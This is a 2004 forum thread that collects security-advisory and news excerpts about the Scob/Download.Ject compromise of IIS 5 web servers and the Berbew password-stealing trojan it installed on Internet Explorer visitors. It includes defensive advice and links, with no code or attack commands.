• Announcements

    • Budfred

      IE 11 copy/paste problem

      It has come to our attention that people using Internet Explorer 11 (IE 11) are having trouble with copy/paste to the forum. If you encounter this problem, using a different browser like Firefox or Chrome seems to get around the problem. We do not know what the problem is, but it seems to be specific to IE 11 and we are hopeful that Microsoft will eventually fix it.
    • Budfred

      PLEASE READ - Reversing upgrade   02/23/2017

      We have found that this new upgrade is somewhat of a disaster.  We are finding lots of glitches in being able to post and administer the forum.  Additionally, there are new costs associated with the upgrade that we simply cannot afford.  As a result, we have decided to reverse course and go back to the previous version of our software.  Since this will involve restoring it from a backup, we will lose posts that have been added since January 30 or possibly even some before that.    If you started a topic during that time, we urge you to make backups of your posts and you will need to start the topics over again after the change.  You can simply paste the copies of your posts that you created at that point.    If you joined the forum this month, you will need to re-register since your membership will be lost along with the posts.  Since you have a concealed password, we cannot simply restore your membership for you.   We are going to backup as much as we can so that it will reduce inconvenience for our members.  Unfortunately we cannot back everything up since much will be incompatible with the old version of our software.  We apologize for the confusion and regret the need to do this even though it is not viable to continue with this version of the software.   We plan to begin the process tomorrow evening and, if it goes smoothly, we shouldn't be offline for very long.  However, since we have not done this before, we are not sure how smoothly it will go.  We ask your patience as we proceed.   EDIT: I have asked our hosting service to do the restore at 9 PM Central time and it looks like it will go forward at that time.  Please prepare whatever you need to prepare so that we can restore your topics when the forum is stable again.
Sign in to follow this  
Followers 0
AplusWebMaster

IIS hacks???

7 posts in this topic

FYI...from the Internet Storm Center:

 

- http://isc.sans.org/diary.php?date=2004-06-24

Updated June 25th 2004 01:27 UTC

"RFI - Russian IIS Hacks?

UPDATE (2100 UTC) - Thanks to everybody who generously provided updates to us today. We still do not know how the IIS servers are originally infected with the JavaScript or the modification to the configuration files. Any additional theories or ideas are welcome.

The reason for the attack seems to point back to the spamming community. There is quite a bit of evidence that what we are seeing is yet another technique for spreading and installing "spamware" (software that assists in either creating, relaying, proxying, or otherwise participating in the sending of spam.) We don't see any evidence that this attack is related to the construction of a DDoS network or other type of typical zombie-based attack group. However, we continue to monitor and will provide updates if anything further develops...

[original diary entry follows]

A reader pointed us to an IIS discussion group (microsoft.public.inetserver.iis.security ***) where several IIS administrators discovered some strange .dll files on their web servers in the past 24 hours. According to the discussion on that list, they are all 1kb .dll files. They were deposited in the \winnt\system32\inetsrv directory with names like iis7xy.dll where x is a random number that appears to be between 1-3 and y is a random character or number...

The Storm Center would like to know if others are seeing this phenomena and if there are any ideas about it origin or intent (other than being an attempt to download malware - that's obvious.) The IP address in the JavaScript points to a Russian site, and at the time of this writing it is still active. A note of caution - that site will attempt to insert malicious code onto a visiting machine. Use extreme caution if you decide to visit it."

 

Also (may be related) >>> Corporate Web servers infecting visitors' PCs

- http://news.com.com/2102-7349_3-5247187.ht...g=st.util.print

June 24, 2004, 6:35 PM PDT

"...The Internet Storm Center, which monitors Net threats, confirmed that the list of infected sites included some large Web properties. "We won't list the sites that are reported to be infected in order to prevent further abuse, but the list is long and includes businesses that we presume would normally be keeping their sites fully patched," the group stated on its Web site. The group also pointed out that the malicious program uploaded to a victim's computer is not currently detected as a virus by most antivirus software. With no patch from Microsoft, that leaves Internet Explorer users vulnerable. A representative of the software giant was not immediately available for comment on when a patch might be available..."

 

***

- http://www.microsoft.com/technet/community...y〈=en&cr=US

Edited by apluswebmaster

Share this post


Link to post
Share on other sites

FYI...

 

IIS 5 Web Server Compromises

- http://www.us-cert.gov/current/current_activity.html#iis5

added June 24

"US-CERT is aware of new activity affecting compromised web sites running Microsoft's Internet Information Server (IIS) 5 and possibly end-user systems that visit these sites. Compromised sites are appending JavaScript to the bottom of web pages. When executed, this JavaScript attempts to access a file hosted on another server. This file may contain malicious code that can affect the end-user's system. US-CERT is investigating the origin of the IIS 5 compromises and the impact of the code that is downloaded to end-user systems.

- Web server administrators running IIS 5 should verify that there is no unusual JavaScript appended to the bottom of pages delivered by their web server.

- This activity is another example of why end users must exercise caution when JavaScript is enabled in their web browser. Disabling JavaScript will prevent this activity from affecting an end-user's system, but may also degrade the appearance and functionality of some web sites that rely upon JavaScript. US-CERT recommends that end-users disable JavaScript unless it is absolutely necessary. Users should be aware that any web site, even those that may be trusted by the user, may be affected by this activity and thus contain potentially malicious code..."

Share this post


Link to post
Share on other sites

FYI...from the Internet Storm Center:

 

Compromised Web Sites Infect Web Surfers

- http://isc.sans.org/diary.php?date=2004-06-25

Updated June 25th 2004 14:11 UTC

"...A large number of web sites, some of them quite popular, were compromised earlier this week to distribute malicious code. The attacker uploaded a small file with javascript to infected web sites, and altered the web server configuration to append the script to all files served by the web server. The Storm Center and others are still investigating the method used to compromise the servers. Several server administrators reported that they were fully patched.

- If a user visited an infected site, the javascript delivered by the site would instruct the user's browser to download an executable from a Russian web site and install it. Different executables were observed. These trojan horse programs include keystroke loggers, proxy servers and other back doors providing full access to the infected system.

- The javascript uses a so far unpatched vulnerability in MSIE to download and execute the code. No warning will be displayed. The user does not have to click on any links. Just visiting an infected site will trigger the exploit..."

 

>>> For further information, visit the URL in this post, and there -is- alot more.

 

:(

Share this post


Link to post
Share on other sites

More info:

 

- http://www.f-secure.com/weblog/

00:56 GMT

"...We are investigating a case called "RFI - Russian IIS Hacks?"...

 

12:04 GMT

"...Microsoft published an update on the Scob (aka Download.Ject) case..."

 

>>> http://www.microsoft.com/security/incident...nload_ject.mspx

Updated June 25, 2004 12:35 A.M. Pacific Time

"Microsoft teams are investigating a report of a security issue affecting customers using Microsoft Internet Information Services 5.0 (IIS) and Microsoft Internet Explorer, components of Windows..."

 

(For more information, visit the MS URL in this post --^, and there -is- alot more)

Share this post


Link to post
Share on other sites

FYI...

 

- http://isc.sans.org/diary.php?date=2004-06-25

Compromised Web Sites Infect Web Surfers

(for more details, also see yesterday's diary:

- http://isc.sans.org/diary.php?date=2004-06-24 )

"UPDATE 17:26 UTC Jan 25 2004

LURHQ published a detailed analysis of the "Berbew" trojan downloaded by this exploit. According to this analysis, the trojan will capture passwords as use log into given e-commerce, bank or auction web sites..."

 

- http://www.lurhq.com/berbew.html

June 25, 2004

"...The trojan is installed via the ADODB/javascript redirection exploit for Internet Explorer for which there is no current patch. When a user visits an infected IIS server using IE, the trojan will be downloaded from a Russian webserver and executed in the background...The trojan appears to be designed for the purposes of "phishing", that is, stealing financial and other account details from the infected user..."

Share this post


Link to post
Share on other sites

FYI...

 

-aka-

JS.Scob.Trojan

- http://www.sarc.com/avcenter/venc/data/js.scob.trojan.html

"...The Trojan's dropper sets it as the document footer for all pages served by IIS Web sites on the infected computer..."

(FYI...reference graphic image shown)

 

 

.

Share this post


Link to post
Share on other sites

Correction:

 

Although related (possibly same author and target), the JS.Scob.Trojan and the Berbew trojan are two different items of malware:

 

JS.Scob.Trojan

- http://www.sarc.com/avcenter/venc/data/js.scob.trojan.html

 

This is but one of several Berbew variaints:

- http://www.sarc.com/avcenter/venc/data/bac...r.berbew.g.html

 

.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0